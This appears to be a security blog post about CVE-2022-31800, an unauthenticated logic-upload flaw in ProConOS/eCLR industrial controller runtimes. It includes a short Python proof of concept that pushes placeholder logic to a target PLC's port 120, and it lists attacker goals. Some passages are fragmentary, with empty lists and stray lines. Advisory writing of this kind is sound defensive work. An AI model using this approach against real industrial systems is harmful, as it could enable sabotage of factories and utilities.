In 2022, security researchers found a critical vulnerability tracked as CVE-2022-31800 affecting the ProConOS/ProConOS eCLR real-time operating systems. These platforms are used in programmable logic controllers (PLCs) that drive automation in factories, industrial robots, and even key utilities infrastructure worldwide.
What's shocking is just how easy it is for a remote attacker—*with no password or prior access*—to exploit this flaw and gain full control over any affected device. In this post, we'll break down how CVE-2022-31800 works, walk through a proof-of-concept attack, and share resources for protecting your equipment.
What Devices Are at Risk?
ProConOS and ProConOS eCLR are lightweight real-time operating systems made by KW-Software (now part of Phoenix Contact Software). They're deeply embedded into industrial control devices used by several major vendors, including:
and others
If you have PLCs or industrial controllers running *ProConOS* or *ProConOS eCLR*, check your firmware versions immediately.
How Does the Attack Work?
The problem lies in how these devices accept logic updates. An attacker on the network (or sometimes even remotely!) can send specially crafted logic upload requests—*without authentication*—to the device. That means you don’t need a username, password, or any insider info.
Exfiltrate data or sabotage operations
The root issue: Devices listen for logic transfers (often on TCP port 120) but fail to require proper credentials or verification on incoming connections.
Proof-of-Concept Exploit
Below is a simplified proof-of-concept Python snippet. This code attempts to connect to a PLC's logic update port and push a dummy (malicious) logic file.
WARNING: For educational purposes ONLY! DO NOT run this on any device you do not own.
import socket
PLC_IP = "192..2.10" # Change to the target PLC's IP
PLC_PORT = 120 # ProConOS standard logic update port
malicious_logic = b"FAKELOGIC" # In reality, this would be compiled PLC logic.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((PLC_IP, PLC_PORT))
print(f"Connected to PLC at {PLC_IP}:{PLC_PORT}")
# Send the logic as if we were a legitimate tool
s.sendall(malicious_logic)
print("Malicious logic sent. The device could be compromised!")
s.close()
With real attack code, an attacker could upload:
A backdoor for ongoing access
#### Note: Tools like PLCScan and network sniffers like Wireshark can help identify vulnerable devices.
Espionage: Steal industrial recipes or production data.
Similar attacks have hit water plants, car factories, and power plants in the past.
How to check if you’re vulnerable
1. Identify any devices running ProConOS/ProConOS eCLR (check vendor labels, manuals, or with the manufacturer).
2. See if remote logic uploads require authentication (use the above script carefully on a test system).
Reference Links
- Original CISA Advisory - ICSA-22-174-01 ProConOS/ eCLR
- Phoenix Contact eCLR/ProConOS Security Notification
- CVSS Details from NVD
- PLCScan Tool for finding exposed PLCs
Conclusion
CVE-2022-31800 is a prime example of how old-school “security by obscurity” in industrial automation is no match for today’s attackers. If your industrial devices run ProConOS or ProConOS eCLR—and you haven’t upgraded or isolated them—*you are at serious risk*.
Take action: patch, firewall, and monitor your critical control devices now.
*If you found this alert helpful, please share it with your operations or IT security team.*
Timeline
Published on: 06/21/2022 08:15:00 UTC
Last modified on: 06/28/2022 17:04:00 UTC